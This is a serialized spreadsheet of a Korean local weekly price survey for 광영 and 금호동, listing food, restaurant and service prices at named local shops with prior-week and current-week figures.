[27,"콩","1kg",2,2,{"v":8320,"d":"8,320"},{"v":8320,"d":"8,320"},0,"광영농협",{"v":9640,"d":"9,640"},{"v":9640,"d":"9,640"},0,"광영시장",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[28,"고춧가루","3kg",2,2,{"v":91000,"d":"91,000"},{"v":91000,"d":"91,000"},0,"광영농협",{"v":102000,"d":"102,000"},{"v":102000,"d":"102,000"},0,"광영시장",{"v":80000,"d":"80,000"},{"v":80000,"d":"80,000"},0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",1,1,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":9000,"d":"9,000"}},{"v":9000,"d":"9,000"},{"$f":"G36-F36","v":0},"이신자설렁탕",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},{"$f":"K36-J36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},2,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"김가네",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"중앙칡냉면\n(서울냉면)",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},{"$f":"O37-N37","v":0}]
[3,"비빔밥","1인분(보통)",2,2,{"v":6750,"d":"6,750"},{"v":6750,"d":"6,750"},0,"광영팥죽\n(팔구식당)",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"김밥천국",{"v":5500,"d":"5,500"},{"v":5500,"d":"5,500"},0]
[4,"갈비탕","1인분(보통)",2,2,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"이신자설렁탕",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"조선옥",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[5,"삼계탕","1인분(보통)",2,2,{"v":14500,"d":"14,500"},{"v":14500,"d":"14,500"},0,"원진삼계탕",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"능이야산에가자",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0]
[6,"된장찌개\n백반","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"팔구식당",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"호롱식당\n(금호식당)",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[7,"김치찌개\n백반","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"팔구식당",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"호롱식당\n(금호식당)",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,{"v":20290,"d":"20,290"},{"v":20290,"d":"20,290"},0,"조선옥",{"v":28580,"d":"28,580"},{"v":28580,"d":"28,580"},0,"맛내골",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,{"v":34770,"d":"34,770"},{"v":34770,"d":"34,770"},0,"조선옥",{"v":41540,"d":"41,540"},{"v":41540,"d":"41,540"},0,"부광참숯불구이",{"v":28000,"d":"28,000"},{"v":28000,"d":"28,000"},0]
[10,"생선초밥","1인분(보통), 활어기준",0,0,0,0,0,"없음",0,0,0,"없음",0,0,0]
[11,"튀김닭","양념통닭 1마리",2,2,{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0,"아주커통닭",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0,"네네치킨",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[12,"칼국수","1인분(보통)",2,2,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,"광영팥죽\n(바지락칼국수)",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"짱칼국수",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[13,"조리라면","분식점 1인분",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"광영팥죽\n(김가네)",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"꼬마김밥여행",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[14,"김밥","분식점 1인분",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"광영팥죽\n(김가네)",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"꼬마김밥여행",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[15,"짜장면","1인분(보통)",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"자금성",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"장수관",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[16,"짬뽕","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"자금성",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"장수관",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[17,"탕수육","일반탕수육(보통)",2,2,{"v":17500,"d":"17,500"},{"v":17500,"d":"17,500"},0,"자금성",{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0,"장수관",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[18,"돈가스","일반돈가스,1인분",2,2,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"김가네",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"김밥천국",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[19,"햄버거","기본형(야채,고기)",2,2,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"하나베이커리",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,"브레드빈",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[20,"피자","기본형(야채,고기)",{"$f":"COUNTIF(J55,\"<>0\")+COUNTIF(N55,\"<>0\")","v":2},2,{"v":11950,"d":"11,950"},{"v":11950,"d":"11,950"},0,"히트피자",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"피자스쿨",{"v":10900,"d":"10,900"},{"v":10900,"d":"10,900"},0]
[21,"커피(외식)","일반원두커피",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"데일리에\n스프레소",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"단Dan",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"데일리에\n스프레소",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"단Dan",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,{"v":12340,"d":"12,340"},{"v":12340,"d":"12,340"},0,"조선옥",{"v":14680,"d":"14,680"},{"v":14680,"d":"14,680"},0,"부광참숯불구이",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,{"v":12500,"d":"12,500"},{"v":12500,"d":"12,500"},0,"조선옥",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"화성숯불돼지갈비",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0]
[25,"쇠갈비","식육식당 200g(국내산)",1,1,{"v":41250,"d":"41,250"},{"v":41250,"d":"41,250"},0,"조선옥",{"v":41250,"d":"41,250"},{"v":41250,"d":"41,250"},0,"업종변경 \n(고기나라)",0,0,0]
[26,"생맥주","500CC 1잔",2,2,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"변사또",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"김복남맥주1995",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[27,"공동\n주택관리비","목우 18평1개월\n(공과금 제외)",2,2,{"v":61500,"d":"61,500"},{"v":61500,"d":"61,500"},0,"가야아파트",{"v":74000,"d":"74,000"},{"v":74000,"d":"74,000"},0,"현대저층아파트",{"v":49000,"d":"49,000"},{"v":49000,"d":"49,000"},0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"대도세탁소",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"뉴스타세탁소",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"대도세탁소",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"뉴스타세탁소",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,{"v":175000,"d":"175,000"},{"v":175000,"d":"175,000"},0,"그린골프장\n(조프로골프)",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},{"$f":"K69-J69","v":0},"광영골프장",{"v":200000,"d":"200,000"},{"v":200000,"d":"200,000"},{"$f":"O69-N69","v":0}]
[35,"노래방\n이용료","일반인 저녁 1시간",{"$f":"COUNTIF(J70,\"<>0\")+COUNTIF(N70,\"<>0\")","v":2},2,{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"J J노래방\n(업종변경)",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"열정노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,{"v":10500,"d":"10,500"},{"v":10500,"d":"10,500"},0,"당돌이 \n당구장",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"월드당구장",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0,"대성사진관",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0,"디지털포토",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"대성사진관",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"디디지털포토",{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,"없음",{"$nulls":3},"없음",null,null,0]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},2,{"v":17500,"d":"17,500"},{"v":17500,"d":"17,500"},0,"명동이발관",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},{"$f":"K75-J75","v":0},"경민이발관",{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0]
[41,"미용료","성인여자 파마(일반)",2,2,{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0,"시집가는날",{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0,"강나영헤어&헤드스파",{"v":60000,"d":"60,000"},{"v":60000,"d":"60,000"},0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",2,2,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,"스파렉스",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"궁전사우나",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",0,0,0,0,0,"없음",{"$nulls":3},"없음"]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",{"$f":"COUNTIF(J79,\"<>0\")+COUNTIF(N79,\"<>0\")","v":2},2,{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},0,"모리스모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"K79-J79","v":0},"코리아모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},{"$f":"O79-N79","v":0}]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,{"$nulls":3},"없음",{"$nulls":3},"없음"]
[46,"PC방\n이용료","1회 이용시",{"$f":"COUNTIF(J81,\"<>0\")+COUNTIF(N81,\"<>0\")","v":2},2,{"$f":"IF(D81=0,0,SUM(J81,N81)/D81)","v":{"v":1200,"d":"1,200"}},{"v":1200,"d":"1,200"},{"$f":"G81-F81","v":0},"초콜렛pc존",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},{"$f":"K81-J81","v":0},"몬스터pc",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},{"$f":"O81-N81","v":0}]
[47,"택배이용료","20kg이하, 타지역",1,1,{"v":16000,"d":"16,000"},{"v":16000,"d":"16,000"},0,"CJ택배",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"우체국택배\n(추가)",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",1,1,{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"스파렉스",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"없음",null,null,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,{"$nulls":3},"없음",{"$nulls":3},"없음",null,null,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":5625,"d":"5,625"}},{"v":5625,"d":"5,625"},{"$f":"G86-F86","v":0},"광영농협",{"v":5350,"d":"5,350"},{"v":5350,"d":"5,350"},{"$f":"K86-J86","v":0},"G마트",{"v":5900,"d":"5,900"},{"v":5900,"d":"5,900"},{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,{"v":1190,"d":"1,190"},{"v":1190,"d":"1,190"},0,"광영농협",{"v":1180,"d":"1,180"},{"v":1180,"d":"1,180"},0,"G마트",{"v":1200,"d":"1,200"},{"v":1200,"d":"1,200"},0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,{"v":1045,"d":"1,045"},{"v":1045,"d":"1,045"},0,"광영농협",990,990,0,"G마트",{"v":1100,"d":"1,100"},{"v":1100,"d":"1,100"},0]
[4,"식용유","콩기름 1.8ml",2,2,{"v":7730,"d":"7,730"},{"v":8230,"d":"8,230"},500,"광영농협",{"v":7480,"d":"7,480"},{"v":8480,"d":"8,480"},{"v":1000,"d":"1,000"},"G마트",{"v":7980,"d":"7,980"},{"v":7980,"d":"7,980"},0]
[5,"설탕","정백당 1kg",2,2,{"v":2240,"d":"2,240"},{"v":2240,"d":"2,240"},0,"광영농협",{"v":1980,"d":"1,980"},{"v":1980,"d":"1,980"},0,"G마트",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0]
[6,"생수","플라스틱 1병(500㎖)",2,2,515,515,0,"광영농협",480,480,0,"G마트",550,550,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"v":1600,"d":"1,600"},{"v":1600,"d":"1,600"},0,"광영농협",{"v":1550,"d":"1,550"},{"v":1550,"d":"1,550"},0,"G마트",{"v":1650,"d":"1,650"},{"v":1650,"d":"1,650"},0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"v":1395,"d":"1,395"},{"v":1395,"d":"1,395"},0,"광영농협",{"v":1390,"d":"1,390"},{"v":1390,"d":"1,390"},0,"G마트",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,"제철주유소",0,0,0,"광영주유소",0,0,0]
[10,"경유","주유소 판매 1ℓ",{"$f":"COUNTIF(J95,\"<>0\")+COUNTIF(N95,\"<>0\")","v":2},2,{"v":1549,"d":"1,549"},{"v":1549,"d":"1,549"},0,"제철주유소",{"v":1499,"d":"1,499"},{"v":1499,"d":"1,499"},0,"광영주유소",{"v":1599,"d":"1,599"},{"v":1599,"d":"1,599"},0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"$f":"IF(D96=0,0,SUM(J96,N96)/D96)","v":{"v":1658.5,"d":"1,659"}},{"$f":"IF(E96=0,0,SUM(K96,O96)/E96)","v":{"v":1644,"d":"1,644"}},{"v":-14.5,"d":"-15"},"제철주유소",{"v":1658,"d":"1,658"},{"v":1629,"d":"1,629"},-29,"광영주유소",{"v":1659,"d":"1,659"},{"v":1659,"d":"1,659"},0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"v":140000,"d":"140,000"},{"$f":"IF(E97=0,0,SUM(K97,O97)/E97)","v":{"v":140000,"d":"140,000"}},0,"그라미피아노",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},0,"유신영피아노",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",1,1,{"v":120000,"d":"120,000"},{"v":120000,"d":"120,000"},0,"선영미술학원",{"v":120000,"d":"120,000"},{"v":120000,"d":"120,000"},0,{"$nulls":3},0]

{"sheet":"금호동","index":6,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
[" 주간 물간동향 (금호동)"]
[{"$nulls":12},"조사자 : 김보미"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(GS수퍼)",{"$nulls":3},"조 사 2 지 역(웰빙마트)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg(웰빙간척)",2,{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":{"v":58400,"d":"58,400"}},{"v":58400,"d":"58,400"},{"$f":"G7-F7","v":0},"GS슈퍼",57800,57800,{"$f":"K7-J7","v":0},"웰빙마트",59000,59000,{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},2,{"v":1690,"d":"1,690"},{"v":1640,"d":"1,640"},-50,"GS슈퍼",1680,1680,0,"웰빙마트",1700,1600,-100]
[3,"상추","잎상추 500g",2,2,{"v":6850,"d":"6,850"},{"v":4490,"d":"4,490"},{"v":-2360,"d":"-2,360"},"GS슈퍼",6200,4420,-1780,"웰빙마트",7500,4560,-2940]
[4,"양상추","상품1개(350~400g)",2,2,{"v":3474,"d":"3,474"},{"v":3474,"d":"3,474"},0,"GS슈퍼",4768,4768,0,"웰빙마트",2180,2180,0]
[5,"애호박","상품1개(300~350g)",2,2,{"v":1240,"d":"1,240"},{"v":1240,"d":"1,240"},0,"GS슈퍼",1480,1480,0,"웰빙마트",1000,1000,0]
[6,"열무","상품 4kg(1단)",1,1,{"v":12250,"d":"12,250"},{"v":8000,"d":"8,000"},{"v":-4250,"d":"-4,250"},"GS슈퍼",12250,8000,-4250,"웰빙마트",0,0,0]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},2,{"v":2640,"d":"2,640"},{"v":2640,"d":"2,640"},0,"GS슈퍼",2480,2480,0,"웰빙마트",2800,2800,0]
[8,"오이","상품 3개",2,{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},{"v":2985,"d":"2,985"},{"v":3040,"d":"3,040"},55,"GS슈퍼",2970,4580,1610,"웰빙마트",3000,1500,-1500]
[9,"풋고추","신선한것 1kg",2,2,{"v":15200,"d":"15,200"},{"v":18900,"d":"18,900"},{"v":3700,"d":"3,700"},"GS슈퍼",18400,16800,-1600,"웰빙마트",12000,21000,9000]
[10,"마늘","깐것 상품 1kg",2,2,{"v":12000,"d":"12,000"},{"v":16400,"d":"16,400"},{"v":4400,"d":"4,400"},"GS슈퍼",11000,19800,8800,"웰빙마트",13000,13000,0]
[11,"감자","흰색 1kg",2,2,{"v":5780,"d":"5,780"},{"v":5530,"d":"5,530"},-250,"GS슈퍼",7560,6560,-1000,"웰빙마트",4000,4500,500]
[12,"배추","1포기 3kg",2,2,{"v":4390,"d":"4,390"},{"v":4390,"d":"4,390"},0,"GS슈퍼",4480,4480,0,"웰빙마트",4300,4300,0]
[13,"콩나물","1봉지 500g ",2,2,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"GS슈퍼",2600,2600,0,"웰빙마트",2400,2400,0]
[14,"사과","상품 1개(300∼350g)",2,2,{"v":3240,"d":"3,240"},{"v":3240,"d":"3,240"},0,"GS슈퍼",3980,3980,0,"웰빙마트",2500,2500,0]
[15,"배","(600-700)",2,2,{"v":4900,"d":"4,900"},{"v":3633.5,"d":"3,634"},{"v":-1266.5,"d":"-1,267"},"GS슈퍼",5800,3267,-2533,"웰빙마트",4000,4000,0]
[16,"바나나","상품 1kg",2,2,{"v":3890,"d":"3,890"},{"v":4240,"d":"4,240"},350,"GS슈퍼",3980,3980,0,"웰빙마트",3800,4500,700]
[17,"쇠고기\n(한우)","등심 600g(상등육)",2,2,{"v":83799,"d":"83,799"},{"v":83799,"d":"83,799"},0,"GS슈퍼",95598,95598,0,"웰빙마트",72000,72000,0]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",1,1,{"v":39600,"d":"39,600"},{"v":27600,"d":"27,600"},{"v":-12000,"d":"-12,000"},"GS슈퍼",39600,27600,-12000,"웰빙마트",0,0,0]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},2,{"v":15030,"d":"15,030"},{"v":17790,"d":"17,790"},{"v":2760,"d":"2,760"},"GS슈퍼",14160,17880,3720,"웰빙마트",15900,17700,1800]
[20,"닭고기","육계 1마리(1kg 정도)",2,2,{"v":9180,"d":"9,180"},{"v":10230,"d":"10,230"},{"v":1050,"d":"1,050"},"GS슈퍼",9860,11960,2100,"웰빙마트",8500,8500,0]
[21,"달걀","특란 30개 한판",2,2,{"v":7700,"d":"7,700"},{"v":7430,"d":"7,430"},-270,"GS슈퍼",7800,6960,-840,"웰빙마트",7600,7900,300]
[22,"조기","15cm 1마리",1,1,{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"GS슈퍼",1400,1400,0,"웰빙마트",0,0,0]
[23,"갈치","60cm 1마리",1,1,{"v":11583,"d":"11,583"},{"v":11583,"d":"11,583"},0,"GS슈퍼",3933,3933,0,"웰빙마트",7650,7650,0]
[24,"명태","40cm 1마리",{"$f":"COUNTIF(J30,\"<>0\")+COUNTIF(N30,\"<>0\")","v":2},2,{"v":6350,"d":"6,350"},{"v":6350,"d":"6,350"},0,"GS슈퍼",5900,5900,0,"웰빙마트",6800,6800,0]
[25,"고등어","30cm 1마리",2,2,{"v":3380,"d":"3,380"},{"v":3300,"d":"3,300"},-80,"GS슈퍼",4060,3900,-160,"웰빙마트",2700,2700,0]
[26,"냉동오징어","30cm 1마리",2,2,{"v":4366.5,"d":"4,367"},{"v":4366.5,"d":"4,367"},0,"GS슈퍼",2933,2933,0,"웰빙마트",5800,5800,0]
[27,"콩","1kg",2,2,{"v":11435,"d":"11,435"},{"v":11435,"d":"11,435"},0,"GS슈퍼",12250,12250,0,"웰빙마트",10620,10620,0]
[28,"고춧가루","3kg",1,1,{"v":175880,"d":"175,880"},{"v":175880,"d":"175,880"},0,"GS슈퍼",175880,175880,0,"웰빙마트",0,0,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",2,2,{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":10000,"d":"10,000"}},{"v":10000,"d":"10,000"},{"$f":"G36-F36","v":0},"고을정",10000,10000,{"$f":"K36-J36","v":0},"석천",10000,10000,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"고을정",9000,9000,0,"송학",7000,7000,0]
[3,"비빔밥","1인분(보통)",2,2,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,"감채원감자탕",8000,8000,0,"송학",7000,7000,0]
[4,"갈비탕","1인분(보통)",1,1,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,null,0,0,0,"송학",8000,8000,0]
[5,"삼계탕","1인분(보통)",{"$f":"COUNTIF(J40,\"<>0\")+COUNTIF(N40,\"<>0\")","v":2},2,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,"감채원감자탕",14000,14000,0,"송학",13000,13000,0]
[6,"된장찌개\n백반","1인분(보통)",1,1,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,null,0,0,0,"송학",7000,7000,0]
[7,"김치찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J42,\"<>0\")+COUNTIF(N42,\"<>0\")","v":2},2,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,"감채원감자탕",8000,8000,0,"송학",7000,7000,0]
[8,"불고기","1인분(200g)\n공기밥 제외",1,1,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,null,0,0,0,"석천",20000,20000,0]
[9,"등심구이","1인분(200g)\n공기밥 제외",0,0,0,0,0,null,0,0,0,null,0,0,0]
[10,"생선초밥","1인분(보통), 활어기준",1,1,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,null,0,0,0,"석천",15000,15000,0]
[11,"튀김닭","양념통닭 1마리",{"$f":"COUNTIF(J46,\"<>0\")+COUNTIF(N46,\"<>0\")","v":2},2,{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0,"bbq",22000,22000,0,"달빛창고",18000,18000,0]
[12,"칼국수","1인분(보통)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[13,"조리라면","분식점 1인분",{"$f":"COUNTIF(J48,\"<>0\")+COUNTIF(N48,\"<>0\")","v":2},2,{"v":4250,"d":"4,250"},{"v":4250,"d":"4,250"},0,"마음한줄",4500,4500,0,"매화김밥",4000,4000,0]
[14,"김밥","분식점 1인분",2,2,{"v":2900,"d":"2,900"},{"v":2900,"d":"2,900"},0,"마음한줄",3300,3300,0,"매화김밥",2500,2500,0]
[15,"짜장면","1인분(보통)",2,2,{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0,"총관루",7000,7000,0,"용궁",7000,7000,0]
[16,"짬뽕","1인분(보통)",2,2,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"총관루",9000,9000,0,"용궁",9000,9000,0]
[17,"탕수육","일반탕수육(보통)",2,2,{"v":22500,"d":"22,500"},{"v":22500,"d":"22,500"},0,"총관루",25000,25000,0,"용궁",20000,20000,0]
[18,"돈가스","일반돈가스,1인분",1,1,{"v":7500,"d":"7,500"},{"v":7500,"d":"7,500"},0,"은화수",7500,7500,0,null,0,0,0]
[19,"햄버거","기본형(야채,고기)",1,1,{"v":4300,"d":"4,300"},{"v":4300,"d":"4,300"},0,"맘스터치",4300,4300,0,null,0,0,0]
[20,"피자","기본형(야채,고기)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[21,"커피(외식)","일반원두커피",{"$f":"COUNTIF(J56,\"<>0\")+COUNTIF(N56,\"<>0\")","v":2},2,{"v":2850,"d":"2,850"},{"v":2850,"d":"2,850"},0,"망고스토리",2800,2800,0,"파리바게트",2900,2900,0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"망고스토리",3500,3500,0,"파리바게트",4000,4000,0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"감채원감자탕",12000,12000,0,"송학",10000,10000,0]
[24,"돼지갈비","식육식당 200g(국내산)",1,1,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,null,0,0,0,"송학",11000,11000,0]
[25,"쇠갈비","식육식당 200g(국내산)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[26,"생맥주","500CC 1잔",{"$f":"COUNTIF(J61,\"<>0\")+COUNTIF(N61,\"<>0\")","v":2},2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"bbq",4000,4000,0,"달빛창고",3500,3500,0]
